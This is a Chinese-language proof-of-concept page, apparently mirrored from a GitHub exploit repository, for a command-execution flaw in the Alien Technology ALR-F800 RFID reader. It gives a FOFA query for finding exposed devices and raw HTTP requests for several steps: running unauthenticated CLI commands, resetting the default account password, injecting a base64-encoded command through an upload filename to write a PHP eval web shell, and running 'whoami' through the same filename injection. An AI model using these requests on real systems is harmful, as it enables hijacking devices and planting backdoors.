mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 22:14:15 +00:00
92 lines
2.2 KiB
Markdown
92 lines
2.2 KiB
Markdown
![]() |
# ALR-F800存在命令执行漏洞
|
|||
|
|
|||
|
该漏洞存在于 /var/www/cmd.php 中,未经授权的攻击者可以执行任意 CLI 命令,包括修改网络配置和登录凭据。
|
|||
|
|
|||
|
## fofa
|
|||
|
|
|||
|
```java
|
|||
|
"ALR-F800"
|
|||
|
```
|
|||
|
|
|||
|
## poc
|
|||
|
|
|||
|
```java
|
|||
|
POST /cmd.php HTTP/1.1
|
|||
|
Host:
|
|||
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
Content-Length: 21
|
|||
|
|
|||
|
cmd=help
|
|||
|
```
|
|||
|
|
|||
|
重置密码
|
|||
|
|
|||
|
```java
|
|||
|
POST /cmd.php HTTP/1.1
|
|||
|
Host: VULNERABLE_SERVER_IP
|
|||
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
Content-Length: 21
|
|||
|
|
|||
|
cmd=password=password
|
|||
|
```
|
|||
|
|
|||
|
Web 界面和 SSH 的默认帐户(用户名 Alien)的密码将重置为密码 password
|
|||
|
|
|||
|
## 写文件
|
|||
|
|
|||
|
通过上面修改了web页面密码,进行修改Authorization认证,再通过下面请求包进行getshell
|
|||
|
|
|||
|
```java
|
|||
|
POST /cgi-bin/upgrade.cgi HTTP/1.1
|
|||
|
Host: VULNERABLE_SERVER_IP
|
|||
|
Authorization: Basic YWxpZW46cGFzc3dvcmQ=
|
|||
|
Content-Length: 301
|
|||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ3keNKAe5AQ9G7bs
|
|||
|
|
|||
|
------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
|
|||
|
Content-Disposition: form-data; name="uploadedFile"; filename=";echo ZWNobyAiPD9waHAgZXZhbChcJF9SRVFVRVNUWydjbWQnXSk7Pz4iID4gL3Zhci93d3cvc2hlbGwucGhw| base64 -d | sh"
|
|||
|
Content-Type: application/octet-stream
|
|||
|
|
|||
|
Hi!
|
|||
|
------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
|
|||
|
```
|
|||
|
|
|||
|
WebShell将被写入:
|
|||
|
|
|||
|
```
|
|||
|
https://VULNERABLE_SERVER_IP//shell.php?cmd=phpinfo();
|
|||
|
```
|
|||
|
|
|||
|
|
|||
|
|
|||
|
## 命令执行
|
|||
|
|
|||
|
```java
|
|||
|
POST /admin/system.html HTTP/1.1
|
|||
|
Host: VULNERABLE_SERVER_IP
|
|||
|
Content-Length: 412
|
|||
|
Cache-Control: max-age=0
|
|||
|
Authorization: Digest username="alien", realm="Authorized users only", nonce="e01f9b86814aced6260f94fdfc978b21", uri="/admin/system.html", response="cbc415aecfcceb4a4afa23973960b8da", qop=auth, nc=000000cc, cnonce="dd03b48ea65cac94" #REPLACE THIS
|
|||
|
Connection: keep-alive
|
|||
|
|
|||
|
------WebKitFormBoundaryJpks6wYXiOago8MS
|
|||
|
Content-Disposition: form-data; name="upload_max_filesize"
|
|||
|
|
|||
|
3M
|
|||
|
------WebKitFormBoundaryJpks6wYXiOago8MS
|
|||
|
Content-Disposition: form-data; name="uploadedFile"; filename=";whoami"
|
|||
|
Content-Type: application/octet-stream
|
|||
|
|
|||
|
123
|
|||
|
------WebKitFormBoundaryJpks6wYXiOago8MS
|
|||
|
Content-Disposition: form-data; name="action"
|
|||
|
|
|||
|
Install
|
|||
|
------WebKitFormBoundaryJpks6wYXiOago8MS--
|
|||
|
```
|
|||
|
|
|||
|
|
|||
|
|
|||
|
## 漏洞来源
|
|||
|
|
|||
|
- https://github.com/Push3AX/vul/blob/main/Alien%20Technology%20/ALR-F800.md
|